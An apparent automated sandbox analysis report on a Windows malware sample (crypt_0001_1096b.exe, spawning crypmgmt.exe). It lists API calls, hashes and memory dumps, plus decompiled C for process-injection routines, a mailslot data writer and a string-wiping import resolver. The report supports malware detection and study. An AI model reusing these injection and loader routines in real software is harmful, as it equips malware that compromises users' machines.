  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64003

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:34C71A2B5584813A6BC94888E3669320
Total matches:36
Initial Analysis Report:Open
Initial sample Analysis ID:64003
Initial sample SHA 256:34CD6B92357754175CDC0BCA3CDA8C2AA439CDFBCC03683EE3B3D502E4C71151
Initial sample name:crypt_0001_1096b.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
